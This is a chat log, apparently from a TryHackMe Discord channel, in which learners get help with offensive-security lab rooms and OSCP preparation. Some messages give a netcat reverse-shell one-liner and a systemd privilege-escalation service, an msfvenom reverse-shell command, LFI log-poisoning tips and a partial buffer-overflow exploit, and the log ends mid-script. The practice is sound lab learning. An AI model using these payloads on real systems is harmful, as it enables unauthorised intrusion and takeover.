#offensive-pentesting-path
Not sure if my previous work experience is very relevant lol but I've been learning as much as I can this past year, trying to gain a clearer perspective on the opportunities out there
Yea, there's no doubt you'll be able to switch. If anything, do research on some job roles that you find interest in, look at their roles/job descriptions, and most job descriptions overlap in what they are looking for or want you to do, so that's good. But if most entry level job roles you want to go for keep saying "preferred: Security+..." etc, then get that one cert, start learning some stuff that accompanies the job roles if you don't really know them well enough, and apply
I needed the IP of the box. That's why I asked from the beginning but you didn't get what I was talking about.
It doesn't show up in the port scanner.
Hi, how do you guys get the IP of the machines that are at the locked screen? Blue for example, I'm trying to do it again without logging in to it, and it looks like the network card is sleeping or something like that. Or is it because the Windows license is expiring? I need to know if it can be done without logging in to it,
I'm talking about the offline machines,
Got it. My bad, I had to change the network card setting in vbox to be in same network 😄
hey all, I had a quick question on the Kenobi room Task 2. The last question talks about the rpcbind port that was discovered previously during recon. Then it goes on to say "In our case, port 111 is access to a network file system." How would I know that outside of this room? Is it just because we see Samba running on other ports that we assume the rpcbind port has a NFS backend?
The nmap scan was able to fingerprint it
cool, thanks!
Hi Guys, I'm trying to git clone Kerbrute tool.
But no Internet on the host... what can I do?
Why do you need it on the host?
Hey guys!!! Been having an issue with the very end of Steel Mountain. Ran everything exactly to the T. But no luck. Looked at many other forums, write ups but nothing.
I’m not using metasploit.
Refuse to
@buoyant zinc are you throwing your executable into the directory before the "Advanced..." I believe, and starting and stopping the service in that same directory?
Put the exe, then do stop and start
Thank you btw.
Ok I will do that. Thank you! I will let you know what happens. I need to hit the hay.
Aye no problem, welcome!
@fleet wedge Yeah no luck with inputting the exe first and then stop/start the service.
I will continue to search and retrace my steps
I might put a different port within the payload.
So how would you guys go about taking a disk image of a whole machine? Let's say I have full root privileges and want to look at the machine locally so there is no way of me doing any damage to the machine. (a Linux machine)
I am trying to do the Buffer Overflow Prep room but cannot connect to the machine with xfreerdp. It just gives me a black screen for a couple of seconds then the window closes and it says Network disconnect in the CLI!
@ebon dome you could use clonezilla boot up disk or, even dd
Have you ever tried nomachine or dwservice? I honestly don't know what is the easiest for ctf/pentest work.
TBH, I haven't really compared these against one another. I just wanted to give some options.
Hi, I'm in the Internal room, I've got credentials for the admin page and got a reverse shell as www-data, but I don't know how to move forward, any tips? Also, I've got a couple of credentials for phpmyadmin, but I don't think that is the right path...
keep enumerating the filesystem for interesting files. linpeas or linux-smart-enum should help you find something interesting
So what's going on there? Just boxes in a couple different websites to help with oscp?
Ah ok. Yea just making sure
hi
@turbid crest that is the list of boxes and challenges I did in place of the PWK labs.
@rancid vine what's wrong with the PWK labs? Or nothing, and these are just extra resources?
I didn't find the PWK experience to be of much benefit. So I found things that were.
Except you have to buy them, so eh
Hi, is there anyone who can unblock me here. I always seem to get this issue when attempting to get a shell. I have looked everywhere and even had to reinstall my kali. Thanks in advance
That local IP looks... wrong?
@near ginkgo I’m blocked in a sense that I can’t move beyond this point . Unable to complete my rooms
@covert scarab was following some write up, this is an ip I got from the machine I spun up
@near ginkgo will do
bruh
I give up
I'm outta here
ifconfig is deprecated
Not only that but I said it's the wrong local IP so "showing it's the wrong local IP" is already out of the question
thanks a lot, much appreciated!!
An interviewer just asked me an extremely weird question
What's the first command I would type to ensure that my reverse PHP shell is working properly....
Is there a right answer for this? I usually just do ls.....
Ask #infosec-general here.
uname will tell you the info about the machine it's being run on
While I appreciate the advice, I was asking not because I didn't know these commands and could only say ls.
That’s a wack question
The question is likely to test whether someone checks their situational awareness when it comes to initial access to a target, or pivoting to a subsequent endpoint.
Wait, you gotta pay for the labs on top of the cert or no?
The question by itself doesn’t provide enough context to have a definitive answer, but I would say ‘id’ or ‘hostname’. These will confirm right away you’re on a different system.
Hey can anyone help me in bypassing php filter? I am uploading a webshell but the server is commenting my php code
different people have different ways to confirm that the shell worked imo
look at my pm july
Reading up on different scanning methods currently as part of my courses and rooms. Curious to hear how you lot do nmap or rustscan, what flags, how to do firewall/IDE bypass, remain stealthy etc.
What room are you doing on TryHackMe?
Finished Linux and Networking fundamentals, currently working my way through web hacking fundamentals
this great room may answer some of your questions.
Reading about nmap -sS flag for example, which in reality is not stealthy at all
That's interesting. So why is it not stealthy?
I should rather say, -sS by itself is not stealthy. You're still sending ICMP packets (SYN packet) to a host, and if you're sending that rapidly to all ports on an IP address, that should be easy to spot for modern IDEs. Maybe 20 years ago -sS was stealthy, but surely that's not the case anymore?
So I'm assuming you would need a variety of flags and approaches. Like, scan with decoys, scan through a VPN, make packet sizes random, make the user header random, fit in with the general noise on the internet
Ah, I see, that makes sense. Right, basically use more flags and approaches like you said. Just need to "blend in"
At that point, shodan?
It really depends on how the environment is logging the requests. I have been in environments where the SYN is not logged but the rest of the handshake is
elaborate? io?
Indeed. Why scan over the internet if someone's already done it for you?
I know of Shodan but have not really played with it. So Shodan will scan the ports for you? And what type of search would you do to perform this?
Shodan already has scanned the ports for you
any good sources to learn more on how to use shodan?
There's a room on it but it's private
Unless you're a student, you'll probably need to pay in order to get much use out of it
I pay for the upgraded membership, would I be able to access it?
trying to look for the room currently
the shodan room is being updated last I heard
Oh ok, I'll keep an eye out for that
Private, not subscriber only
Oh ok thanks for the info
Hey, I've completed this path. How do I generate the Completion Certificate?
There is no certification for completing any path.
Ah, that's why. Alright, thanks.
Yes there is. It will say "Get Certificate"
Certificate of Completion that is...
well that is something new. you are right.
Sorry, I was wrong. In the right corner click on the Certificate button.
But I don't see it. I've completed the path.
Okay, I see it. Wasn't there in the morning when I finished it.
Weird.
Hi! Anyone around that can help with BOF? I keep running the sample Python code and the program keeps crashing on the first 100 mb, which is strange...
Hi guys. How long does the discount last if I complete the CompTIA PenTest+ path?
Until the end of the year
Thanks mate
Still need help ?
Did you figure that one out? I am seeing the same thing
I do if you are around
is this the right result for fuzzer.py? How many bytes do we know were sent?
Fuzzing with 100 bytes
Could not connect to 10.10.173.38:1337
No it's not
You have to run the exe in the debugger first and then to run the fuzzer in the attacker machine
@sturdy flame
yes got that far
I'm not getting this in the !mona findmsp - distance xxx
EIP contains normal pattern : ... (offset XXXX)?
should that be in the output of the log data?
got it..
Hey not sure if this is the right channel, but can someone help if I've done something wrong here? I am doing the Blue room. When i do the metasploit exploit it always fails, output is attached
yesss all sorted, thanks again
You ok now ? ;)
I recommend just asking directly
Fuzzing with 1267 bytes
Fuzzing with 1268 bytes
Could not connect to 10.10.178.212:1337
When it hits 1268, THAT is the offset, right?
You're using python2 right?
would that make a difference?
Yes, python3 handles raw bytes and some network stuff totally differently
hm
Many people have stuck with python2 for it because it's considerably easier
If you're using the script provided in the room, it's python2
So is that why it has been inconsistent?
Ok thanks, been racking my brain on why it changed in a few attempts
Same with the exploit.py?
Yeah there's a reason people stick with 2 for BoF stuff
I got the same offset this time. Then searching for the EIP in mona with 1268 + 400 doesn't show the EIP offset in the application
figured it out, my mistake
thanks for the python2 advice
Use
python fuzzer.py
I finally got the process. It was a bit confusing with the offset for the exploit.py
Huh?
That script was written for python2
python happens to be python3 on some systems
Which you need to remember. That includes the attackbox
It's never mentioned to use python2
I used Kali 2020
As I remember, the room there counts 100 per 100
yea
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Error: One or more options failed to validate: LHOST, LPORT.
Hi guys, anyone ever experienced the above, trying to create a shell using msfvenom?
sorted
May I ask your intentions? This sounds very specific
Anyone who took the OSCP, is Linux Buffer Overflows on the exam?
You could run into anything. Discussing topics that are on the exam is against OffSec's rules, so I'm gonna have to ask you to stop here. Please don't try fishing for exam specifics.
ok thanks!
I'm doing DailyBugle and the website isn't loading, but it is there and I got a screenshot of the frontpage through autorecon. I am very confused.
Do I need a hostname in my hosts file for the site? Or do I need to use a certain browser.
Gobuster etc is enumerating directories too and getting some 200s, but I still can't physically view the page.
Do you have a proxy turned on?
Hi all, currently doing Internal and can't seem to capture any traffic in burp/zap after settings up the ssh port forward to my localhost. Not sure what's happening here.
i have a problem of downloading this path's certificate
in the cert my nickname is written instead of my full name
The intercept was on when I tried last night, although it works fine when I close the ssh session. I'll try foxy proxy when I get home to see if this helps.
hi everyone, anyone have problems with the BoF of brainstorm? I have success when I reproduce locally the exploit, but not success on the deployed machine :c anyone in the same situation?
Just got home, froxy proxy works like a charm! Thanks again.
just finished relevant room but it seems i exploited it not the intended way as in the walkthrough
There's an unintentional if you know how to do more than just fire the default eternal blue at it.
I had a hard time trying to prevent that with the way the box is built.
That's if you went that route anyways. I note that it exists in the room.
Yea, that room took me a lot of time, 2 days to be exact. Really nice one, kudos to you. Still have a lot to learn
So the offensive pentesting path is that oscp focused?
Yep
Cool thought so but just didn't see it stated like that :).
We can't call it OSCP path because it's copyrighted from offsec iirc or something like that but yea this is desired to be an OSCP path
actually that makes a lot of sense :D.
Just finished my lab time on PWK... and not ready, so will try and work through this path.
It's not just meant for OSCP either.
That's why it's named offensive pentesting path.
Just fried my brain doing 5 buffer overflows 😅
speaking of buffer overflows, can someone help me with a question regarding jumping to another register other than ESP?
Heellooo, is there anyone who escalated to system in alfred room without using metasploit
I have, have you figured this out yet or do you need help on this?
What do you all usually use as your first nmap command, considering you want to scan all ports? I am trying to look for a scan that will find me 95 percent of the information of a host (open ports, services, OS) but that also doesn't take me half an hour to run😂, any suggestions?
Anybody able to answer a query on steel mountain?
It's always best to ask directly. Otherwise, people don't know if they can help straight away so they're less likely to engage.
Well basically, I was wondering: when I use PowerUp.ps1 on the machine, my enumeration scan is missing the "Can restart" field. Every other field is present.
So I had to manually try to stop/restart each service instead of using the info from PowerUp.ps1 to check if I had access
I think other people have had that too ¯\_(ツ)_/¯
makes sense, I was just wondering, as I see more and more services on non standard ports that nmap would not find in the standard 1000 ports.
nmap -sV -v -p-
You get the ports back straight away, so you can carry on recon
As soon as they're found
Something like rustscan will find them faster
Never heard of rustscan before, now reading up on it. Looks cool, do you prefer it over nmap? Or are there certain use cases in which you prefer one or the other?
I don't tend to use rustscan
Threader3000 first. It runs -sC -sV on the ports it found.
Easy to install. Just run pip3 install threader3000
Run it wherever you want to save the output. It outputs as an XML that you can upload to Pentest.WS or wherever else. And I commented out a line that you can uncomment to allow xsltproc to convert your xml to html for web browser use if you prefer.
Can someone suggest a web application pentester roadmap on THM, starting from beginner?
The beginner path, then the webapp path
Is it necessary to know about privilege escalation basics before getting into the webapp path?
You asked for webapp pentesting, correct?
Yes
Ok, and is privesc a part of webapps?
I think it may be required to get root/admin access to a website
Well, I don't know anything about privilege escalation..
I think you're confused with what a webapp is.
Root is for Linux/Unix
That's not part of webapp.
Web app is just the webapp.
I mean to say like admin access... to all directories in a web app
Including the hidden ones which cannot be accessed by web scrapers..
That's not privesc
Or something like that
I really recommend starting with the true beginner path, and then asking again once you have the groundwork.
Ohh... ok... thanks... I think I have to go with the complete basics for some more time..
Privilege escalation exists in web applications.
And yes, it can include gaining access to parts of the application where others are not authenticated to be.
Like all the directories.
@hoary oxide I sent you a priv
It's most definitely not the same thing though. Same concept, at a very high level, but not the same.
I'm not the one that said it. Anyone pentesting knows that simply isn't true.
Gaining admin access is absolutely a part of web application privilege escalation, as yash had asked.
privilege escalation basics with no context, that's the problem
You don't need to learn what THM would classify as privesc basics if you're trying to do webapp privesc.
I just think it's unclear and bad advice. They were obviously asking about web stuff. Made suggestions about gaining admin access to web sites, directories, etc.
¯\_(ツ)_/¯
What do I know.
yashvendra, Today at 11:38 AM:
I mean to say like admin access... to all directories in a web app
Including the hidden ones which cannot be accessed by web scrapers..
NinjaJc01 | James, Today at 11:38 AM:
That's not privesc
That's a pretty good privesc in my opinion.
root/admin access to a website.
Feel free to give them better advice.
Rather than attacking me for it.
Learning the fundamentals will help all the way through.
@keen iris @rancid vine A query without proper clarity from a noob (myself) led to a hard discussion between you guys... sorry for that... anyway, thanks for helping me out..
So earlier this morning I provisionally passed the PenTest+ exam. I have to give credit to the TryHackMe team, as having access to this service was a critical component in gaining the necessary knowledge to go for this exam and pass it!
BoF Brainstorm: it is 64-bit, so I tried to set up a Windows machine and downloaded Immunity. However, Immunity is 32-bit and complains about trying to open the file (chatserver.exe). How did you guys go about it? I may try working with x64dbg instead, but that would mean that I couldn't use Immunity/mona for this like on previous exercises. Edit: the files were corrupted. I re-downloaded them and it works fine.
Congrats on passing!!
thank you!!
Congrats @meager raft ! I gave you a shiny new Pentest+ badge 🙂
That's awesome, thank you very much for doing that @simple loom !
@meager raft good Job! I am taking the exam next week. Would you mind shooting me a dm with your opinion of the exam? Of course without violating the CompTIA rules on disclosures.
@hoary oxide @fleet wedge Hey guys, I could use your help with Alfred w/o Metasploit if you'd be willing
Dm me your question
Thanks a lot @hoary oxide. That was helpful!
Btw if anyone is looking, I have another way to get root flag W/O metasploit for Alfred 🙂
No problem man
Anyone facing the same issue? I got a 500 internal error
when accessing tryhackme.com
???
yes, as of 30 minutes ago the site started having issues according to the announcement, and I just got the 502 error.
so it looks like the site may be down for the time being
Check #announcements
Hi need a nudge on internal priv esc to root 😂
Forget tools. Enumerate manually.
Hmm, I got user already, I did it all the way manually
can someone link me the oscp banned tools list pls
Found this on their website, I would suggest doing further research: https://help.offensive-security.com/hc/en-us/articles/360040165632-OSCP-Exam-Guide
ok thanks
Hi all, currently doing Attacktive Directory and running into errors when using GetNPUsers.py. Not sure if this has happened to anyone else?
Try using GetNPUsers without the “python3” part should just run using the path
Same error, I even reinstalled the module it's asking for.
Oh, install the requirements using "pip3 install -r requirements.txt"
All satisfied already, which is strange
Hey guys, I am trying the Brainpan room and I'm a bit stuck after gaining a shell. After running linpeas there is something ||that can be executed with sudo /home/anansi/bin/anansi_util|| . Am I on the correct path or should I look elsewhere? Also found ||some interesting groups like adm and samba||. And tried || SUID|| but without success.
found it, sorry about the question
Gatekeeper room: I am having an issue running the local file. I downloaded gatekeeper.exe and put it on a Windows 10 machine. I have Immunity with the mona plugin running on it. However, when I try running gatekeeper.exe I get an error. I do have VS 2015 Community installed, so it is not the vcruntime14.dll. Thus, I am unable to run it. How did you guys run it?
Hey guys, I can't find an answer on why an IIS Windows server won't read a payload .asp but can read a .aspx? I played around with msfvenom, but I can't find the documentation explaining this. Does anyone know the difference?
You should run it on a Win7 x86 SP1; that way you should not have any problem. Remember the program is made for a 32-bit OS.
Thanks, I'll give it a try.
you have to port forward from your vm to get a reverse shell to work right?
why would you have to do that?
How do you add the OSCP tag to your name?
If you're thinking about the role, you ask a moderator when you are certified
be certified and kindly ask mods.
Already 🙂
Who is the person to ask ? 🙂
I just don't want to start DM'ing randomly 🙂
Thanks for the help!
What is the name of the career role that is legally employed to find vulnerabilities in applications?
Does anyone know the answer?
Ok, I tried, but I will look for more, because first I tried the easiest way kkkk
We are not here as a substitute for your own research
I know that I wasn't researching I was looking for help
Ok, it was badly boring, thanks for the attention.
^^^^^^^
I think that's related to almost everything in life in terms of success 😄
Hey everyone, transferred accesschk.exe to windows server 2012, but it ain't working. I've downloaded this one: https://web.archive.org/web/20111111130246/http://live.sysinternals.com/accesschk.exe which is supposed to work in older windows versions too. After transferring with smbserver, typing the following accesschk.exe /accepteula should normally be the first thing to type & after only typing accesschk.exe should show the syntax
but I get no output
it's the mr robot room
I'm not a big fan of automated tools, so trying to do everything as manually as possible & without checking any writeups
Anybody have an opinion on where a novice like me should start learning to hack? I was told to start with CTFs using TryHackMe and Hack The Box, but some of that looks foreign to me. I am open to all suggestions
!docs free-path
This is the discord for tryhackme, after all
Should I get a subscription then, or is it even necessary??
box speeds?
If you subscribe then your boxes deploy with more resources
So they boot faster and are faster
If the machine I'm using is somewhat strong, the box speeds can still be slow
?
Doesn't matter seeing as they're not on your machine
They're on AWS
They're not running locally
Ok, I'll set it up and get started. Thank you
THM is not only for ctf, you can also have amazing training in networks, linux, etc if you aren't into that yet 👍
Haven't done the linux rooms in THM, but they are also CTF-like, which is cool
Ok, I'll look into that too! Thank you!!
It all depends on what you mean by novice, but audit yourself on networking, Linux, programming, web, etc.
I also consider myself a novice but I can handle myself pretty well on THM
Should I just buy courses on them on Udemy, or just use YouTube and other similar sites?
Just start. Do whatever you feel inclined to do, because you may not know a lot of things. Once you've dived into the water for some time you'll know what to do next 👍
Do 1 week of research on the topics you like (If you like programming, research languages, their uses, where to learn it, etc.), and on week 2, start actually learning from what you condensed on week 1 (courses, books, TryHackMe, whatever your brain learns best)
If you don't know what "box speed" means then dive into networking, Linux, virtualization, that kind of stuff. It's not very complicated but it's very IT slang
Man, I appreciate y'all so much! I'll start there too
Can anyone help me out here as to why I can't see the contents of the directory?
Type shell then you'll be able to cd into the directory
Thanks 😄
can I dm @grave lion ?
sure
Hi guys, I am new to pretty much everything, so bear with my silly basic questions
Could someone possibly help me determine my next steps on going from LFI to a shell? This is an area I struggle in and was hoping someone could help walk me through it.
did you check any of the guides on google already for that? something specifically not working?
Essentially, you could do with having a file that you can write to
Or another way of writing to files
Then, you include that file
The file will have PHP etc in it that will be executed when included
Log poisoning is a common one
Example right now I can run this; it then creates a download and I can read the contents.
I wanted to try log poisoning however the logs don't appear to be in the default locations.
Php filters can also help
can you find the configuration files?
they'll tell you where the logs are
or you can try /proc/self/fd/# where # is 1, 2, 3, 4, ...
Just finished the RootMe room. I got stuck on the last part, where I looked for SUID binaries. I read a writeup and saw that ||usr/bin/python|| was particularly interesting. Is that something you just have to learn and remember to look for next time? How would I know that that particular file was interesting out of every file listed? Are there other "obvious" files or paths I should look out for when searching for SUID bins?
mainly experience, anything that doesn't look right you can look up at https://gtfobins.github.io/
☠️✌🏻
Hey guys!
I'm doing the steelmountain room and I'm having problems executing the AdvancedSystemCareService9 service.
For some reason I'm getting an: [SC] StartService FAILED with error 216.
Any Ideas?
check your nc @fleet wedge
@velvet tapir nothing in my nc
Try backing up and copy the file again,
Suppose in a CTF you are supposed to exploit a SUID/SGID file. You use find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2>/dev/null to locate all files with SUID/SGID bit enabled. Now, how do you filter non-exploitable results from possible ones ? Assuming using the said result with -h returns no version number for easy search.
@final stirrup you can try to make a whitelist like linenum.sh is using (variable binarylist https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh ) but you will still not see custom ones. You could also try to make a blacklist but you may filter wrong results. I wanted to do the same at first but at some point I just learnt to spot them little by little, too many special cases
What made it better for you in spotting them? Because that is kinda my end game for my methodology. At the moment, SUID binaries that are not obvious are the last thing I look for, and I would really like to reduce my time in filtering them, but I am out of ideas. And I will look at your suggestion in LinEnum. Thanks.
Yes to begin with just executing Linenum will show you the Linux binaries that are known to be vulnerable when the SUID bit is set, but it won't show you the custom ones (user created), so you'll still have to learn them a bit. When I began I made a list of my SUID binaries on my kali machine + the "normal" ones on a kali machine and I compared them. For the ones that were not in the list I used https://gtfobins.github.io/#+suid
Thanks. That indeed sounds smart. I too will make a note of this. Thank you very much.
For future reference make sure that you are typing the command correctly 😄
||msfvenom -p windows/shell_reverse_tcp LHOST=<Attacker IP> LPORT=<NC port> -e x86/shikata_ga_nai -f exe -o ASCService.exe||
!docs free-path
Same. WinPEAS has been impossible 2 times now. Not sure what I'm doing wrong
Someone told me that maybe you should try to run the esp in the Desktop directory and make sure it has executable permission. I didn't try it yet but you can try this; if it works plz poke me, I will be very thankful
I'm not sure if it runs or not. It just breaks my reverse shell and it just hangs.
@tribal ferry if you want to paste commands use code blocks.
@tribal ferry I think you downloaded the web page rather than the powershell code
Hi, I'm doing our offensive pentesting path, and I wonder, is this the OSCP path? I mean, is it specifically oriented towards the oscp?
I've read a couple reviews on "Tryhackme oscp path" but I think there isn't any specific path by THM
That's actually a good practice to double-check the exploits/scripts, so you're not running the html page of exploit-db haha
It's not OSCP specific, but it was created to help with certifications like it and eCPPT.
Guys I had a doubt about the 10% discount offered on Pentest+ on completing the path. For how long is the discount valid after completion of the path? I want to finish the path but don't plan to take the certification just yet
What is the best way / path / roadmap to prepare for OSCP? I was looking around a bit and came across TheCyberMentors course (3 courses in a bundle: a) 'Practical Ethical Hacking - The complete course' b) 'Windows Privilege Escalations for Beginners' c) 'Linux Privilege Escalations for Beginners'.
Would this be recommended? Will it prepare me for the OSCP? Or should I rather choose another way? If so, which one? What experience have you had?
Is the OSCP at all suitable for an absolute beginner? Should I perhaps first take another certification?
The best way to prepare for the OSCP is to immerse yourself in as many lab environments as you can.
TCM's and Tib's Windows and Linux privesc rooms on the platform are great. As are their Udemy courses on the same instruction.
And what about the Practical Ethical Hacking course from TheCyberMentor (TCM ?)? Is that also recommended?
Yea. It's a really good course as well.
Ooh, I think I’ve got that saved on Udemy, glad people can recommend it
Alright. So I will get the complete Windows and Linux privesc, as well as Practical Ethical Hacking Bundle. Parallel to that a THM sub 🙂
But I'd recommend buying that directly from the actual TCM website 😄
The BUFFER OVERFLOW 2 --- is anyone getting no EIP when doing the attempted crash after the FUZZ testing ??? I'm at 700 - but I've gone up to 1100 --with no success -- even up to 3000 on the pattern create -- and cannot crash 2 at all ... ??? I'm following what I did on 1 yesterday and I finished that with no issues... Any suggestions ???
I figured it out --- I saw the difference in the EBP & EBX while looking at the ESP values and deduced that 4 bytes were needed to find the EIP... thanks reverse malware!
Alright
I hope someone here can assist me or point me in the right direction. I’m trying to do the blue room without meterpreter but I’m getting an impacket error
You will have both
Ok so how do I get this working?
@keen iris
Ok, I believe I just installed it. I guess when it says master, that's when it's installed?
wat
ok
any hint for Internal? I got the reverse shell on server and am stuck now
Skip using tools for enumeration.
Anyone else just started this pathway 🙂
yeah
How you finding it?
I'm in buffer overflow, so far it has been awesome, especially Internal and Relevant; Obscured was refreshingly at a different angle,
Glad to hear you liked Internal and Relevant. 🙂
I admit to peeking at the writeups for those a little wee bit
I don’t feel bad for looking at write-ups bc I’m just learning
If I had sat through classes and then had supervised practice then I would try to not look at the help.
Try with -p-, which scans all ports instead of just the "well known" ones
@pallid bison
I need help understanding a step in the kenobi room. How is it inferred that /usr/bin/menu is not using a full path?
If you RE the binary, you can find out that information
what do you mean by RE?
@stark remnant /usr/bin/menu is executing without a full path. As ninja said, you can reverse engineer the binary, or executing it and looking at what it does would be the next step.
@mossy monolith Hint is "there is a reason why the room is called "internal" <---------
Does anyone know how to pull an entire site as one page? I found this page while studying for the OSCP: https://oscpnotes.infosecsanyam.in/ It seems pretty comprehensive. But, everything is an individual link, and I haven't found a way to download this as a document.
Or, archive it so this resource isn't lost forever...
Put the site name into archive.org and hit the button to archive it for you through the waybackmachine.
Will that archive all of the pages? Or, just the single page that I put in the 'save URL' field?
Nevermind, it looks like someone has already done this. Thanks for the help.
It will archive the entire site
You can use Curl to download the entire site.
hey everyone! I've been doing HackPark lately and it's been a while that I've been stuck at its priv esc part. I'm running winPEAS.bat where I should be getting the running processes, but its output isn't covering all the info, nor is it covering abnormal services. Can anyone help?
@low knot so I just finished that one a little bit ago and got stuck at the same part...I'm not sure if maybe there was something wrong with the winPEAS.bat file or what but I ended up having to use the winPEAS.exe file instead.
Yeah i used that too but didn't find running processes there as well.
hmmm...i'm not sure then. the .exe gave me the running processes whereas the .bat didn't...
I am wondering what if similar flaws occur during certification exams.
I haven't gone through one yet myself but from what I've heard from the community, the cert exam stuff is a lot more stable and there's a proctor you can contact in real time for something like that.
that gives a sense of relief..lol
Had issues with that room too yesterday, could not execute the damn shell,
.\shell.exe
In the Vulnversity Lab, the last part where we create an environment variable using ($mktemp).service, the next line is to edit this service file and insert the cat command, but to do so we use the echo '[Service]. I understand that the single quote was used to continue using echo as a way of input, but how does echo know which file to open? What does the [Service] mean?
what port did u use for netcat listener while u executed shell.exe?
echo basically means print , you are not editing the file , the first command is to rm remove the file, and then you create it again, the ' ' is a string of code, TF=$(mkdir).service ,,, it's declaring a variable, best I can do without google,
two separate pastes:
1-
```shell
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ip> <port> >/tmp/f" > /tmp/shell.sh
```
2-
```shell
TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "bash /tmp/shell.sh"
[Install]
WantedBy=multi-user.target' > $TF
/bin/systemctl link $TF
/bin/systemctl enable --now $TF
```
bruuhhh. First of all thank you so much for taking time and explaining it so nicely but I am so sorry I do not get it. I can't wrap my head around the first code. What is happening there? it's okay if you can't explain you can link me a resource, it would work too
It's a common reverse shell payload
So what we do with the 2nd code can be done with the 1st one too?
No.
The first one is a reverse shell payload, being put into a bash script file
The second creates your systemd service that will run it
You could just run that script, but you wouldn't become root because it'd just run as your current user
got it
Thanks man
Thanks thanks
I think u should try 4444/4445/1234 as well.......
If they don't work, then it seems a real issue.......
I mean, there are much better ports to use
yeah u should recommend them......i am myself a n00b afterall....lmao
Yes
Because firewalls with restrictive outbound rules shouldn't block outbound to 443 or 53
alright then, 4444 worked for me btw
oh, that's informative!
The ideal is to use https or something, with 443
yeah exactly
We can listen on an already active port? or do those ports have to be inactive?
You can't listen on a (port+interface combination) that's already being used
So if you had something listening on 127.0.0.1:80, you can have something else listening on say.... 192.168.123.123:80
The escalating shell, I thought the issue was the command to execute. .\shell.exe Didn’t think the choice of port mattered, apparently it does, cool.
On the offensive path, Corp room. This room has a lot of things that are not working properly. I am not sure if it is on purpose or not. For some I found a workaround (like the start menu not working), but for others I can’t figure it out, such as downloading the kerberoast PowerShell file. It says it can’t connect to the server. I tried different ways to download and from different locations but it didn’t work. Same error.
The VM doesn't have internet access
So you need to host the file yourself
so are u done with priv esc part as well? Did winPEAS give all the required output?
running processes especially...
Let me get back on that room,, since I’m curious about the port issue,
yeah, u should! I thought u're done solving the port issue...lol
Guys whenever hydra shows multiple incorrect passwords for one username then is it likely that there's some flaw in the command used or it sometimes does the same even if everything entered is right?
Means it can't detect the failure correctly, usually because your syntax isn't quite right
what a nice way of saying that, your hydra look good , maybe take the . off the error message, and from my notes like hint "while waiting on hydra and dirb decided to cat the files we got"
What do you mean host the file myself? I downloaded the file to my attack machine/Linux, set up the web server and tried downloading the file to the victim using PowerShell/DownloadFile. Now that I think about it, I should try ssh or netcat and see if I can get it that way.
I downloaded the file to my attack machine/Linux. Setup the web server yes that's what I'm suggesting
removing . didn't make any change brother. Btw which files should we cat while waiting?
```
22/tcp  open  ssh          OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
|   256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
|_  256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519)
80/tcp  open  http         Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Skynet
110/tcp open  pop3         Dovecot pop3d
|_pop3-capabilities: TOP PIPELINING SASL AUTH-RESP-CODE UIDL CAPA RESP-CODES
139/tcp open  netbios-ssn  Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap         Dovecot imapd
|_imap-capabilities: LOGIN-REFERRALS post-login more have ID ENABLE capabilities SASL-IR IDLE OK Pre-login listed LITERAL+ LOGINDISABLEDA0001 IMAP4rev1
445/tcp open  netbios-ssn  Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
```
alright! admin might not be the username but I've made sure everything after http-post-form is correct. I hope I'm not missing something silly.😶
I'd help, but I despise squirrelmail brute force
actually i saw a different error message
I'd recommend using ZAP or burp if you can
yeah I have this opened in other tab.
yeah I'm using burp brother.
Fuzz it in burp, rather than using hydra
oh, I'll do that then
sorry got confused,,,, on hackpark is Login failed ,,, you are doing skynet
hydra should work ,,, once you get the correct syntax in ,
see, I've made the syntax with this stuff only.
anyways I'm fuzzing it in burp as well, just a min
in case u guys see any syntax error on the basis of above 2 ss, do let me know......
why ohh why did I go back to that ,,,, still can't get that second reverse shell to work,,,, did the initial one on port 53 , and the second one on 443,, I got it to hit once,,, but the shell wasn't built correctly,,,, and on the first shell, it gets hung up on like pwd,,,
c:\windows\system32\inetsrv>
c:\windows\system32\inetsrv>
c:\windows\system32\inetsrv>
c:\windows\system32\inetsrv>
c:\windows\system32\inetsrv>
c:\windows\system32\inetsrv>
what is that?
it's like running a for loop on pwd,,,
lol that happened to me as well but it got stable in 3rd-4th try I guess.
honestly, can't answer that 😆
cache indigestion
bro, it's too slow....shall take ages this way, gotta find other way round....
- i aint your bro.
- Zap is faster
- oops sorry....
- i shall try that
btw would u mind sharing y do u feel so?
zap is open source, and burp has some limit because it's the free version,,
Because hydra isn't suited to the task.
Hydra is ideal for simpler HTTP brute force or other servers.
alright!
💯
do u recommend brute forcing username as well or admin might work, I am asking with respect to squirrelmail specifically in case u have brute forced there before?
@keen iris
and whenever credentials r required in such cases, is brute force the only way to step ahead?
I did that, but ended up getting the same error about not finding the server. I guess I'll try again and see if it works.
hey, does anybody know how to do priv esc with wildcard injection through mv command?
Is this related to tryhackme? @brave idol
jus curious, can i start oscp path with basic networking and linux knowledge. or is it better to start with complete beginner then oscp?
Room Steel Mountain
Exploiting without Metasploit
I can not run server over port 80 since it is being used by another service, is there any way to get around it.
had a hell of a time with that, openvpn, or change the serving port ,
Openvpn is a waste of time
What about changing the serving port
Knowing that my exploit has a predefined port for the server which 80
OpenVPN isn't a waste of time.
@keen iris blocked in my country, that is what i meant
You can change the port in the exploit if you take a minute to understand what is happening
It's all about the http mentioned in the .py @keen iris
I will say it again
You can change the port in the exploit
BUT you have to understand the URL it's building.
there is another way ,, wmic that requires no upload
@keen iris ok thanks i will give it a try @velvet tapir
```python
import socket

ip = "<target ip>"   # placeholder: the target machine's IP
port = 1337          # port the vulnerable service listens on

prefix = "OVERFLOW1 "
offset = XXXX        # placeholder: replace with the offset found via !mona findmsp
overflow = "A" * offset
